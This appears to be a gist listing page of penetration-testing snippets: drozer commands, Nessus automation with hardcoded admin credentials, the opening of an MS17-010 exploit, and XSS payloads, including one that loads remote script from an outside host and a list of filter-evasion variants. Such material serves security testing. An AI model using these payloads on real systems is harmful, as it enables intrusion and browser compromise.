This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
starting a drozer session | |
$ adb forward tcp:31415 tcp:31415 | |
connecting a drozer | |
$ drozer console connect | |
Retrieving Package Information |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<img src="/" =_=" | |
title="onerror='var/**/w=window.top.document;var/**/x=w.createElement("script");x.type="text/javascript";x.src="https://doom.fredrik-almroth.se/exploit.js";w.getElementsByTagName("head")[0].appendChild(x);window.top.history.pushState("","","/doom.exe");'"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
scan = ness6rest.Scanner(url="https://site:8834", login="admin", | |
password="Welcome@1", insecure=True) | |
scan.upload(upload_file="nessus_policy_NavVA.nessus") | |
scan._policy_add_audit(category="linux",name="NavVa") | |
scan.policy_add(name="NavVa", plugins="21156") | |
scan.scan_add(targets="10.249.25.156") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import sys, copy | |
########################### | |
######## FUNCTIONS ######## | |
########################### | |
def check_arg(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smb, smbconnection | |
from mysmb import MYSMB | |
from struct import pack, unpack, unpack_from | |
import sys | |
import socket | |
import time | |
''' | |
MS17-010 exploit for Windows 7+ by sleepya |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//usage Nessus_automation.py 10.20.20.20/24 | |
#!/usr/bin/python | |
import requests | |
import json | |
import time | |
import sys | |
import os | |
from subprocess import * | |
cmd = "curl -s -k -X POST -H \"Content-Type: application/json\" -d \"{\\\"username\\\": \\\"admin\\\", \\\"password\\\": \\\"@1\\\"}\" https://site.com:8834/session" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
NewerOlder